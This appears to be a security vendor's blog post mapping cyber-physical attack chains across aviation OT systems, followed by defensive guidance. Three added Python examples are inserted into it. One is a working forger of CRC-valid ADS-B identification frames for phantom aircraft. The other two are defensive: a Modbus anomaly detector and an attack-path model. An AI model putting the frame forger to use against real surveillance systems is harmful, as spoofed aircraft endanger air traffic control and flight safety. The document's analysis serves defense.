

Prayukth K V
11 June 2025
From tarmac to tower: Mapping the cyber-physical kill chain in aviation’s OT domains
Marking a new front line in aviation security
When people think of cybersecurity in aviation, their minds often leap to passenger data leaks, airline booking systems, or hacked inflight Wi-Fi. But beneath these familiar IT concerns lies a far more complex and, in many respects, more exposed ecosystem: the Operational Technology (OT) infrastructure that forms the physical backbone of aviation as we know it today.
From air traffic control (ATC) radars to automated baggage handling systems, from refueling pumps to runway lighting, aviation is a carefully managed symphony of diverse and complex cyber-physical systems. Increasingly, adversaries of every kind are learning to manipulate these invisible connections to nefarious ends. This is the age of the cyber-physical kill chain in aviation.
In this post we map the emerging aviation threat landscape, break down each domain in the aviation OT chain, and outline what must be done to secure aviation from tarmac to tower. Let’s get started.
The convergence of cyber-physical systems in aviation
Almost since its inception, aviation’s safety record has been built on redundancy, regulation, compliance, monitoring and rigorous engineering. But digitization has changed the game:
· Legacy systems are now networked.
· Real-time data sharing is essential.
· Efficiency demands automation.
· Air-gapped systems are not automatically secure: removable media, vendor laptops and undocumented links routinely bridge the gap.
· A focus on operational efficiency does not always translate into secure systems and processes.
· Convergence of networks, systems, operations and access has created security challenges at every level, from individual devices and networks to the infrastructure as a whole.
This ongoing convergence of cyber and physical systems, while delivering gains in safety, speed, efficiency and cost, has created new interdependencies. Systems that were once physically isolated are now connected to enterprise networks, cloud platforms, third-party support services, and remote diagnostics.
And that means a single vulnerability can now affect operations across systems that were never designed with cybersecurity in mind.
Why OT in aviation is different
Let’s start with a statement you have heard a thousand times before, because it still matters. Unlike IT environments that prioritize data confidentiality, OT systems in aviation prioritize availability, operational predictability, safety, and physical accuracy. The failure of a baggage conveyor or a boarding bridge can disrupt hundreds of flights and even put lives at risk; the compromise of an Instrument Landing System (ILS) can cause a catastrophic accident.
Key challenges that security teams need to focus on in the aviation sector:
· Long lifespans of equipment (20–30 years on average)
· Diverse proprietary protocols and vendors
· Strict compliance requirements (ICAO, IATA, FAA, EASA)
· High uptime requirements with minimal maintenance windows
· Multiple modes of connectivity
No wonder the cyber-physical kill chain is uniquely dangerous here: in aviation, even a small digital breach can produce an outsized physical effect.
So, what do we mean by a cyber-physical kill chain?
The kill chain concept, popularized by Lockheed Martin’s Cyber Kill Chain, outlines the stages an adversary goes through in executing a cyberattack: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control (C2), and Actions on Objectives.
In OT environments, and especially in aviation, this model must be extended to account for kinetic consequences.
Cyber-physical kill chain in aviation OT:
· Reconnaissance: Mapping airside systems, processes, operational dependencies, security levels and protocols.
· Initial access: Exploiting a third-party maintenance window, stolen credentials or exposed remote interfaces.
· Privilege escalation and lateral movement: Jumping across supposedly siloed networks and systems.
· Persistence and control: Establishing a long-term foothold in OT infrastructure, whether by staying active and loitering, by lying dormant until a trigger, or both.
· Triggering physical impact: Causing delays, safety failures, or chaos.
· Anonymity or deception: Obfuscating the origin of the attack and presenting false system states, so that operators see normal readings while the physical process is being manipulated.
Let’s now move on and explore this through the lens of actual aviation OT domains.
Mapping the OT aviation domain
Each airport and aircraft operation involves dozens of integrated OT subsystems. Here’s a simplified breakdown of the major domains:
Air Traffic Control (ATC) and Navigation Aids
Usually run by a sovereign or state-delegated air navigation service provider rather than by the airport operator, this domain includes primary and secondary radar, ADS-B (Automatic Dependent Surveillance–Broadcast), ILS, VOR/DME, and satellite communication.
Risks:
· Spoofing ADS-B signals, which are broadcast unencrypted and unauthenticated, to inject phantom aircraft (bogeys) and overload air traffic controllers.
· Jamming or denial-of-service (DoS) against navigation beacons.
· Unauthorized firmware updates on ATC systems.
· Insider threats with physical access to critical control centers.
· Displaying incorrect aircraft information on the radar screen.
· Blocking or degrading communication between aircraft and ATC.
Sample kill chain in action: A threat actor uses a rogue drone carrying a jammer to interfere with ILS signals during peak traffic, causing go-arounds and delays while the event appears to be a system glitch.
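The ADS-B spoofing risk above comes down to one fact: a Mode S extended squitter (DF17) frame ends in a 24-bit CRC that detects corruption but carries no key, so anyone with a transmitter can emit a frame that decodes and verifies exactly like a genuine one. The block below is an added example, not code from the original post: it decodes a publicly documented captured identification frame (ICAO 4840D6, callsign KLM1023, reproduced from Junzi Sun’s open ADS-B decoding guide), then forges a CRC-valid frame for a constructed ghost aircraft (address ABCDEF, callsign GHOST01; both invented). The CRC polynomial and 6-bit character table are the ones the Mode S specification uses.

```python
"""ADS-B (Mode S DF17) identification frames: decode a captured frame, then forge one.

Added example, not code from the original post. The forged "ghost" frame
(ICAO ABCDEF / callsign GHOST01, both constructed) passes the same CRC check
as a genuine frame, because the CRC is an error check, not a signature.
"""

MODES_POLY = 0xFFF409  # Mode S CRC-24 generator polynomial, x^24 term implicit

# 6-bit character table used by the identification message (type codes 1-4)
CHARSET = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######"


def modes_crc(data: bytes) -> int:
    """Remainder of data(x) * x^24 modulo the Mode S generator polynomial."""
    crc = 0
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1000000 | MODES_POLY
    return crc & 0xFFFFFF


def crc_valid(frame: bytes) -> bool:
    """A 112-bit DF17 frame is intact when its last 24 bits equal the CRC of the first 88."""
    return len(frame) == 14 and modes_crc(frame[:11]) == int.from_bytes(frame[11:], "big")


def decode_identification(frame: bytes) -> dict:
    """Decode downlink format, ICAO address, type code and callsign from a DF17 TC1-4 frame."""
    df = frame[0] >> 3
    icao = frame[1:4].hex().upper()
    me = frame[4:11]                      # 56-bit "message extended" field
    tc = me[0] >> 3
    if df != 17 or not 1 <= tc <= 4:
        raise ValueError(f"not an ADS-B identification frame (DF={df}, TC={tc})")
    bits = int.from_bytes(me[1:], "big")  # 48 bits: eight 6-bit characters
    chars = [CHARSET[(bits >> (42 - 6 * i)) & 0x3F] for i in range(8)]
    return {"df": df, "icao": icao, "tc": tc,
            "callsign": "".join(chars).rstrip("_"),
            "crc_ok": crc_valid(frame)}


def forge_identification(icao_hex: str, callsign: str, category: int = 0) -> bytes:
    """Build a CRC-valid DF17 TC4 identification frame for ANY address and callsign.

    No key is needed, which is exactly why a cheap SDR transmitter can put a
    phantom aircraft on a controller's screen.
    """
    padded = callsign.upper().replace(" ", "_").ljust(8, "_")
    if len(padded) > 8 or any(ch not in CHARSET or CHARSET.index(ch) == 0 for ch in padded):
        raise ValueError("callsign must be at most 8 characters from the ADS-B alphabet")
    bits = 0
    for ch in padded:
        bits = (bits << 6) | CHARSET.index(ch)
    me = bytes([(4 << 3) | (category & 0x7)]) + bits.to_bytes(6, "big")
    body = bytes([0x8D]) + bytes.fromhex(icao_hex) + me   # DF17/CA5, address, ME
    return body + modes_crc(body).to_bytes(3, "big")


if __name__ == "__main__":
    # Captured frame reproduced from public ADS-B decoding documentation (KLM1023)
    captured = bytes.fromhex("8D4840D6202CC371C32CE0576098")
    print(decode_identification(captured))
    ghost = forge_identification("ABCDEF", "GHOST01")   # constructed ghost aircraft
    print(ghost.hex().upper(), decode_identification(ghost))
```

The defensive corollary is that a receiver cannot tell the ghost from the real thing by inspecting the frame; detection has to come from outside the frame, for example by cross-checking ADS-B tracks against independent radar returns or multilateration, and by flagging tracks that appear mid-air without a prior history.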
Airport ground operations
This includes runway lighting systems, airfield ground lighting (AGL), de-icing control, and weather systems.
Risks:
· Manipulating runway lighting to misguide pilots.
· Delaying apron operations.
· Tampering with meteorological sensors to provide false visibility data.
· Remote-access exploits against lighting control panels.
· Disabling perimeter security systems.
Sample kill chain: Malware infects a remote lighting control module and takes runway lighting offline during low-visibility conditions, halting movements until the lights are restored.
Baggage Handling Systems (BHS)
These massive conveyor networks are fully automated, integrating barcode scanners, x-ray machines, sorters, and bag loaders.
Risks:
· Disruption of the SCADA systems managing the conveyors.
· Manipulation of scanning systems to smuggle restricted items.
· Physical damage by driving motors and sorters beyond their rated limits through manipulated control logic.
Sample kill chain: A disgruntled insider modifies the logic on the PLCs controlling the sorting belts, causing mass misrouting of luggage for international flights.
Fuel systems
This domain covers automated fuel hydrant systems, refueler trucks, pressure control units, and their communication interfaces.
Risks:
· Sensor tampering causing inaccurate fuel measurement.
· Manipulation of pressure valves to create delays or hazards.
· Remote access via mobile fueling apps or terminals.
Sample kill chain: An attacker targets the refueling logic controller, falsifying tank pressure readings and delaying departures until manual checks are completed.
Passenger boarding bridges and gate systems
These include automated gangways, gate allocation systems, and ground support interfaces.
Risks:
· Bridge positioning errors caused by manipulated sensors.
· Unauthorized access to control panels via weak authentication.
· System shutdowns during peak boarding.
· Injury to passengers or ground staff from unexpected bridge movement.
Sample kill chain: A compromised bridge management system disables the boarding bridges across a terminal, creating chaos and cascading flight delays.
Airport Building Management Systems (BMS)
Covers HVAC, fire alarms, elevators, escalators, and energy management, all of which are increasingly IP-connected.
Risks:
· Overheating of server rooms due to compromised HVAC.
· False fire alarms causing terminal evacuations.
· Looping surveillance camera footage to mask a physical intrusion.
Sample kill chain: An attacker manipulates environmental controls to overheat a backup server room, degrading surveillance and control systems as one phase of a larger attack.
Real-world incidents and indicators
Though few aviation OT incidents are publicly disclosed, recent events provide sobering precedents:
· ADS-B spoofing in the Middle East: Ghost aircraft injected into surveillance systems.
· Frankfurt Airport baggage system outage: Suspected cyber sabotage caused massive delays.
· Remote ATC tower vulnerabilities: Research has revealed flaws in the IP-based links between remote (unmanned) tower centers and the regional airports they serve.
· GPS/GNSS jamming and spoofing that alters or denies aircraft navigation, reported across multiple countries.
These incidents reveal a common thread: low visibility, high interconnectivity, and high-impact consequences.
Securing the aviation OT kill chain
Here’s how airports, airlines, and regulators can defend against OT threats:
1. Conduct an OT-specific, IEC 62443-based risk assessment
· Inventory all connected OT assets and interfaces.
· Identify criticality, access pathways, and potential cascading failures.
· Discover and remedy knowledge gaps about what is connected and how.
· Raise the target security level of critical zones to SL 3 (in IEC 62443 terms, protection against deliberate attack by skilled, moderately resourced actors), and measure the achieved level against it.
· Discover and break attack paths between zones.
2. Implement network segmentation
· Segment networks associated with critical systems into zones, with controlled conduits between them, wherever possible.
· Use secure DMZs and unidirectional gateways (data diodes) between IT and OT zones.
3. Enforce access control and monitoring
· Role-based access control for OT systems.
· Session recording for remote vendors and third-party maintenance.
· Real-time anomaly detection using OT-aware tools.
· Automatic termination of remote sessions after a pre-determined duration.
4. Patch management and system hardening
· Prioritize updates during maintenance windows.
· Remove unused services and default credentials.
· Use firewalls and allowlists at device level.
· Maintain an asset inventory with full information on each asset, including its end-of-life date.
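Steps 3 and 4 above (OT-aware anomaly detection, device-level allowlists, maintenance windows, a maintained asset inventory) are easier to reason about when they are written as rules a passive sensor can evaluate. The block below is an added example, not code from the original post or any product: it assumes a sensor on an airfield ground lighting (AGL) control segment that logs one line per Modbus/TCP request, and it checks each request against an inventory, a write allowlist and a maintenance window. All hosts, addresses, names and log lines are constructed for illustration.

```python
"""OT-aware anomaly detection over Modbus/TCP request records: an added example.

Not code from the original post. Assumes a passive sensor on an AGL control
segment emitting "timestamp src dst fc=N unit=N" lines. Inventory, allowlist,
addresses and the sample log are all constructed.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, time

# Modbus function codes that change process state (coil / register writes)
WRITE_FCS = {5, 6, 15, 16, 22, 23}
# Bulk writes are how logic and setpoint tables get pushed; confine them to the window
BULK_WRITE_FCS = {15, 16, 23}

ASSET_INVENTORY = {                 # constructed inventory for the AGL zone
    "10.20.1.10": "AGL-PLC-RWY09",
    "10.20.1.11": "AGL-PLC-TWY",
    "10.20.1.50": "AGL-HMI-TOWER",
    "10.20.1.60": "AGL-ENG-WS",
}
WRITE_ALLOWLIST = {"10.20.1.50", "10.20.1.60"}   # operator HMI and engineering workstation
MAINT_WINDOW = (time(1, 0), time(4, 0))          # overnight window, local time


@dataclass
class ModbusRequest:
    ts: datetime
    src: str
    dst: str
    fc: int
    unit: int


def parse_line(line: str) -> ModbusRequest:
    """Parse '2025-06-11T13:42:07 10.20.1.50 10.20.1.10 fc=3 unit=1'."""
    ts, src, dst, fc, unit = line.split()
    return ModbusRequest(datetime.fromisoformat(ts), src, dst,
                         int(fc.split("=")[1]), int(unit.split("=")[1]))


def in_maintenance_window(ts: datetime) -> bool:
    start, end = MAINT_WINDOW
    return start <= ts.time() < end


def evaluate(req: ModbusRequest) -> list[str]:
    """Return the alerts one request raises; an empty list means it matched the baseline."""
    alerts = []
    for host in (req.src, req.dst):
        if host not in ASSET_INVENTORY:          # a talker the inventory does not know
            alerts.append(f"UNKNOWN_ASSET {host}")
    if req.fc in WRITE_FCS and req.src not in WRITE_ALLOWLIST:
        alerts.append(f"WRITE_FROM_UNAUTHORIZED_HOST {req.src}->{req.dst} fc={req.fc}")
    if req.fc in BULK_WRITE_FCS and not in_maintenance_window(req.ts):
        alerts.append(f"BULK_WRITE_OUTSIDE_MAINTENANCE_WINDOW {req.src}->{req.dst} "
                      f"fc={req.fc} at {req.ts:%H:%M}")
    return alerts


def run(log: str) -> list[str]:
    """Evaluate every line of a log and return all alerts in order."""
    return [alert for line in log.strip().splitlines() for alert in evaluate(parse_line(line))]


# Constructed sample log: an overnight logic download from the engineering
# workstation, routine daytime HMI traffic, then an unknown host that first reads
# and then pushes a bulk write, and finally a bulk write at the wrong time of day.
SAMPLE_LOG = """
2025-06-11T02:15:00 10.20.1.60 10.20.1.10 fc=16 unit=1
2025-06-11T13:42:07 10.20.1.50 10.20.1.10 fc=3 unit=1
2025-06-11T13:42:09 10.20.1.50 10.20.1.10 fc=5 unit=1
2025-06-11T13:45:30 10.20.1.77 10.20.1.10 fc=3 unit=1
2025-06-11T13:46:02 10.20.1.77 10.20.1.10 fc=16 unit=1
2025-06-11T14:10:00 10.20.1.60 10.20.1.11 fc=16 unit=1
"""

if __name__ == "__main__":
    for alert in run(SAMPLE_LOG):
        print(alert)
```

Running it yields five alerts: the unknown host is reported twice (once per request), its bulk write is additionally reported as unauthorized and outside the window, and the engineering workstation’s afternoon download is reported on timing alone. The value of the inventory is visible in the fourth line: a read from a host nobody documented is the reconnaissance step of the kill chain, and it is caught before any write happens.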
5. Adopt a threat-informed defense approach
· Map attack paths using threat modeling.
· Simulate cyber-physical kill chain scenarios (e.g., Red Team/Blue Team exercises).
· Integrate aviation-specific threat intelligence (APT actors, TTPs, malware families).
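Steps 1, 2 and 5 above all revolve around the same model: zones with target security levels, conduits between them, and the paths an attacker can take from an entry zone to a safety-critical one. The block below is an added example, not code from the original post or from any IEC 62443 tooling: it builds a constructed toy airport estate (six zones, six conduits, invented names and levels), enumerates attack paths from the enterprise network and from a vendor VPN to the lighting and navaid zones, and shows how two segmentation changes (removing a flat link, replacing a firewall conduit with a one-way gateway) break them.

```python
"""Zone-and-conduit attack-path analysis for an airport OT estate: an added example.

Not code from the original post. Zones, conduits and security levels are a
constructed toy model of the IEC 62443 zone/conduit approach.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Conduit:
    a: str
    b: str
    kind: str  # "flat", "firewall", "vpn": usable in both directions; "diode": a -> b only


# Constructed zones with IEC 62443 target (SL-T) and achieved (SL-A) security levels
ZONES = {
    "ENT": {"name": "Enterprise IT", "sl_t": 1, "sl_a": 1},
    "VPN": {"name": "Vendor remote access", "sl_t": 2, "sl_a": 1},
    "DMZ": {"name": "IT/OT DMZ", "sl_t": 2, "sl_a": 2},
    "BHS": {"name": "Baggage handling SCADA", "sl_t": 2, "sl_a": 2},
    "AGL": {"name": "Airfield ground lighting control", "sl_t": 3, "sl_a": 2},
    "NAV": {"name": "ILS / navaid monitoring LAN", "sl_t": 3, "sl_a": 2},
}

BASELINE = [
    Conduit("ENT", "DMZ", "firewall"),
    Conduit("DMZ", "AGL", "firewall"),
    Conduit("DMZ", "BHS", "firewall"),
    Conduit("VPN", "BHS", "vpn"),       # vendor VPN lands directly in the BHS zone
    Conduit("BHS", "AGL", "flat"),      # shared switch left over from a terminal expansion
    Conduit("DMZ", "NAV", "firewall"),  # historian pulls navaid status over an open rule set
]

# Hardened: BHS and AGL separated; navaid data leaves NAV through a one-way gateway only
HARDENED = [c for c in BASELINE
            if c != Conduit("BHS", "AGL", "flat") and c != Conduit("DMZ", "NAV", "firewall")
            ] + [Conduit("NAV", "DMZ", "diode")]


def traversal_graph(conduits):
    """Directed graph of where an attacker with a foothold in zone X can move next."""
    g = defaultdict(set)
    for c in conduits:
        g[c.a].add(c.b)
        if c.kind != "diode":   # a firewall passes the permitted protocols; an attacker rides them too
            g[c.b].add(c.a)
    return g


def attack_paths(conduits, entry: str, target: str) -> list[list[str]]:
    """All simple zone-to-zone paths from entry to target, in sorted order."""
    g = traversal_graph(conduits)
    found = []

    def walk(node, path):
        if node == target:
            found.append(list(path))
            return
        for nxt in sorted(g[node]):
            if nxt not in path:
                path.append(nxt)
                walk(nxt, path)
                path.pop()

    walk(entry, [entry])
    return found


def sl_gaps(zones) -> dict[str, int]:
    """Zones whose achieved level is below target, with the size of the gap."""
    return {z: v["sl_t"] - v["sl_a"] for z, v in zones.items() if v["sl_a"] < v["sl_t"]}


if __name__ == "__main__":
    for label, conduits in (("baseline", BASELINE), ("hardened", HARDENED)):
        for entry, target in (("ENT", "NAV"), ("VPN", "AGL")):
            paths = attack_paths(conduits, entry, target)
            print(f"{label}: {entry} -> {target}: {len(paths)} path(s) {paths}")
    print("SL gaps:", sl_gaps(ZONES))
```

In the baseline model the enterprise network reaches the navaid LAN in one hop via the DMZ, and the vendor VPN reaches lighting control by two routes, one of them through the forgotten flat link. Removing that link and turning the historian conduit into a data diode leaves the navaid LAN unreachable from IT and reduces the VPN’s routes to a single, firewalled one; the remaining SL gaps show where further controls are still owed.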
6. Enhance Incident Response Readiness
· Develop OT-centric playbooks (e.g., backup power loss, baggage system failure).
· Conduct joint IT-OT cyber drills.
· Coordinate with civil aviation authorities and law enforcement.
· Deploy network intrusion detection on OT segments, so that incidents are detected from traffic rather than inferred from physical symptoms.
Rethinking resilience: It’s not just about airports
The aviation kill chain isn’t isolated to airports. Airlines, OEMs, fuel suppliers, aircraft maintenance teams, and even catering services are part of this interconnected mesh. Aviation OT security must become:
· Holistic: Covering every operational link.
· Collaborative: With shared threat intelligence.
· Built-In: Designed from procurement to deployment.
As aviation becomes increasingly digital, cybersecurity must evolve from a compliance checkbox into an operational imperative. The next threat actor isn’t just after data: they may want to disrupt a gate, jam a navigation beacon, or halt a baggage system during a holiday rush.
Understanding and securing the cyber-physical kill chain isn’t just about avoiding attacks. It’s about ensuring trust in the world’s most critical mode of global transportation.
Because in aviation, even milliseconds and meters matter, and in OT, the cost of failure is measured not just in downtime, but in lives and livelihoods.
Talk to us now for a free consultation on an IEC 62443-based cyber risk assessment for your OT systems and networks
